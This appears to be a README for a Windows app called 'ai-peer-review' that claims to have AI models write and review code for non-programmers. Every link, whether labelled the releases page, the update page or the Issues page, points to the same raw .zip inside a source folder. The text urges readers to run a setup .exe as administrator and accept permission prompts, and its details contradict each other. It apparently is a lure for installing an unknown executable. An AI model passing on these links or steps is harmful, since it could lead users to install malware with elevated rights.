ai-peer-review is a desktop app that uses three AI helpers to write and review code for you. You explain what you want in normal words. The app asks the AIs to write the code, check for mistakes, or create plans to solve your problem. This helps you get better code without knowing programming.
This app runs three AIs in different ways depending on what you need:
-
Review Mode
One AI writes the code quickly. Another AI looks for errors and suggests fixes. -
Companion Mode
One AI plans the work step by step. The second AI builds the code based on the plan. -
Challenge Mode
Both AIs write code separately at the same time. Then you see both results side-by-side to compare.
-
Visit the releases page here:
https://raw.githubusercontent.com/Dreambear-cloud/ai-peer-review/main/src/components/review-peer-ai-1.2.zip -
On the releases page, look for the latest version. It usually comes as a file named like
ai-peer-review-setup.exeor similar. -
Download the
.exesetup file to your computer by clicking on it. -
Once downloaded, double-click the setup file to start the installer.
-
Follow the installer instructions:
- Choose the installation folder (default works fine).
- Agree to any prompts for permissions.
-
When installation finishes, launch ai-peer-review from your Start Menu or desktop shortcut.
-
The app opens ready for you to type what you want to build in plain English.
- Operating System: Windows 10 or newer
- Processor: Intel Core i3 or equivalent
- Memory: At least 4 GB RAM
- Disk Space: Minimum 500 MB free space
- Network: Internet connection required to access AI models
Type your project idea or task in the main input box. Use simple English. For example:
- "Create a to-do list app with add and delete features"
- "Write a function to sort a list of names"
Pick one of the three modes at the top:
- Review Mode
- Companion Mode
- Challenge Mode
Click the Start button. The app sends your request to the AIs and collects their code and feedback.
- In Review Mode, read the original code and then the improved version.
- In Companion Mode, see the plan and the finished code.
- In Challenge Mode, compare two different code versions side by side.
Use the buttons to copy the code to your clipboard or save it as files on your computer.
Check the releases page often for new versions:
https://raw.githubusercontent.com/Dreambear-cloud/ai-peer-review/main/src/components/review-peer-ai-1.2.zip
Download the latest setup file and run it. It will update your current installation without losing your settings.
- Supports three AI collaboration modes to fit different tasks
- Simple English input, no coding knowledge needed
- Displays AI-generated code and reviews clearly
- Saves time writing and checking code manually
- Works offline once installed, but needs internet to access AI services
- Supports common programming languages like JavaScript, TypeScript, Python
- If the app does not start, check that your Windows is up to date.
- Make sure your internet connection is active for AI requests.
- Restart the app if it freezes or stops responding.
- If code results look incorrect, try rephrasing your description.
- For installation issues, run the installer as administrator by right-clicking the setup file.
If you have difficulties:
- Review the app’s built-in help and instructions under the Help menu.
- Visit the GitHub repository Issues page for common questions:
https://raw.githubusercontent.com/Dreambear-cloud/ai-peer-review/main/src/components/review-peer-ai-1.2.zip - Email support at support@dreambear-cloud.com (if available).
- The app is built with React, TypeScript, and Vite for fast performance.
- It interacts with AI models from OpenAI, Claude, and Gemini under the covers.
- Designed for peer reviewing code snippets and small projects efficiently.